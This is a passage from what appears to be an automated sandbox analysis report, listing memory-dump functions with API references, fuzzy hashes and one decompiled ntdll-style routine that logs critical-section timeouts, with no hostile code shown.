                                                    • Opcode Fuzzy Hash: cbe774aef497af05128902139a08cad897df03c89b7c34b61595848c9f30b6d3
                                                    • Instruction Fuzzy Hash: 74B09BB29014D5C5F711D76046087177D04F7D0745F56C5A5D1020645B4778E091F5B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027788FA, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(02773546,?,02773CBF,02773CBF,?,02773546,?,?,?,?,?,00000000,00000000,?), ref: 027788ED
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                                    • Instruction ID: fd7b3177028e67019477120e033060d9566fc900d890ecd1f5259a072521cace
                                                    • Opcode Fuzzy Hash: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                                    • Instruction Fuzzy Hash: ECA022B3A30088000820B3F23C0C3AAE20C80C32BF0200CEFC00C3000B808BC008302F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 04B5FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E04B5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04B0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04B55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04B55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                    0x04b5fdda
                                                    0x04b5fde2
                                                    0x04b5fde5
                                                    0x04b5fdec
                                                    0x04b5fdfa
                                                    0x04b5fdff
                                                    0x04b5fe0a
                                                    0x04b5fe0f
                                                    0x04b5fe17
                                                    0x04b5fe1e
                                                    0x04b5fe19
                                                    0x04b5fe19
                                                    0x04b5fe19
                                                    0x04b5fe20
                                                    0x04b5fe21
                                                    0x04b5fe22
                                                    0x04b5fe25
                                                    0x04b5fe40

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B5FDFA
                                                    Strings
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B5FE01
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B5FE2B
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
                                                    • Associated: 0000000F.00000002.521651432.0000000004BBB000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    • Opcode ID: 35aa9a4ddabf9e6209fcf10efbc8eb72cf6831a9305e543efcce70e18800b96b
                                                    • Instruction ID: d00cd1b4e69d074f5c794ac4cfe881c38314a4255791ce421afad2a924c4fe8c
                                                    • Opcode Fuzzy Hash: 35aa9a4ddabf9e6209fcf10efbc8eb72cf6831a9305e543efcce70e18800b96b
                                                    • Instruction Fuzzy Hash: FEF0F032200201BFEA251A45DC06F73FF6AEB84730F244395FA68561E1EA62F86096F4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%